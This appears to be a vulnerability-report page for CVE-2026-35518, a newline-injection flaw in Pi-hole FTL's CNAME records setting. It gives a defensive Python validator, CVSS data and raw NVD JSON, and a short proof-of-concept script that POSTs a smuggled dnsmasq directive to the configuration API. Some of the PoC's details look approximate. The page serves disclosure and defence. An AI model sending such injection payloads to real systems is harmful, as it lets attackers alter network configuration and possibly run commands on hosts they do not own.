Security Vulnerability Report
CVE-2026-35518 CVSS 8.8 HIGH

CVE-2026-35518

Published: 2026-04-07 16:16:28
Last Modified: 2026-04-28 20:35:34

Description

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS CNAME records configuration parameter (dns.cnameRecords). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6.
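The check below is an added example, not Pi-hole's code and not the fix shipped in 6.6. It shows the kind of server-side validation that closes the newline injection described above. The entry format `<cname>,<target>[,<TTL>]`, the function names and the sample entries are assumptions made for illustration.

```python
import re

# Assumption: each dns.cnameRecords entry is "<cname>,<target>[,<TTL>]" and is
# written to the dnsmasq configuration as one "cname=<entry>" line.
HOSTNAME = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9_-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9_-]{1,63}(?<!-))*\.?"
)

def validate_cname_record(entry: str) -> str:
    """Return entry unchanged if it is safe to render, else raise ValueError."""
    # Reject control characters first: a CR or LF would end the cname= line
    # and start a new, caller-chosen dnsmasq directive (CWE-93).
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in entry):
        raise ValueError("control character in CNAME record")
    fields = entry.split(",")
    if not 2 <= len(fields) <= 3:
        raise ValueError("expected <cname>,<target>[,<TTL>]")
    for name in fields[:2]:
        # Allowlist: anything outside hostname syntax ("=", spaces, ...) fails.
        if not HOSTNAME.fullmatch(name):
            raise ValueError(f"invalid hostname: {name!r}")
    if len(fields) == 3 and not re.fullmatch(r"[0-9]{1,9}", fields[2]):
        raise ValueError("TTL must be a non-negative integer")
    return entry

def render_cname_lines(entries):
    """Render validated entries; each entry becomes exactly one config line."""
    return [f"cname={validate_cname_record(e)}" for e in entries]

def audit(entries):
    """Return (entry, reason) for every stored entry that fails validation."""
    rejected = []
    for entry in entries:
        try:
            validate_cname_record(entry)
        except ValueError as exc:
            rejected.append((entry, str(exc)))
    return rejected

# Constructed sample values for the setting, not taken from a real system.
SAMPLE_ENTRIES = [
    "www.example.lan,host.example.lan,300",
    "a.example.lan,b.example.lan\ndhcp-option=6,10.0.0.1",
    "a.example.lan,b.example.lan,3600s",
]

if __name__ == "__main__":
    for entry, reason in audit(SAMPLE_ENTRIES):
        print(f"rejected {entry!r}: {reason}")
```

Running `audit` over the stored `dns.cnameRecords` values of a 6.0 to 6.5 installation is also a quick way to spot entries that were written before the upgrade.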

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:* - VULNERABLE
Pi-hole FTL >= 6.0, < 6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-35518: Pi-hole FTL Configuration Injection
# Target: Pi-hole FTL < 6.6
import requests
import json

# Configuration
TARGET_URL = "http://<pi-hole-ip>/api/config"
SESSION_ID = "<valid_admin_or_low_priv_session_cookie>"

# The vulnerability allows injecting newline characters to add arbitrary dnsmasq config.
# This payload attempts to inject a malicious configuration directive.
# Note: Actual command execution depends on the specific dnsmasq directives used.
payload = "legit.cname.example.com=192.168.1.1\ndhcp-option=6,10.0.0.1"

headers = {
    "Content-Type": "application/json",
    "Cookie": f"PHPSESSID={SESSION_ID}"
}

# Data structure to update the dns.cnameRecords setting
data = {
    "config": {
        "dns": {
            "cnameRecords": payload
        }
    }
}

try:
    response = requests.post(TARGET_URL, headers=headers, data=json.dumps(data))
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the dnsmasq configuration file or trigger a config reload to execute.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/pi-hole/FTL/security/advisories/GHSA-28g5-gg88-wh5m (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35518", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:28.243", "lastModified": "2026-04-28T20:35:34.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS CNAME records configuration parameter (dns.cnameRecords). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.5", "matchCriteriaId": "8C927FF0-74A4-4F13-95A8-E80C5E80F607"}]}]}], "references": [{"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-28g5-gg88-wh5m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}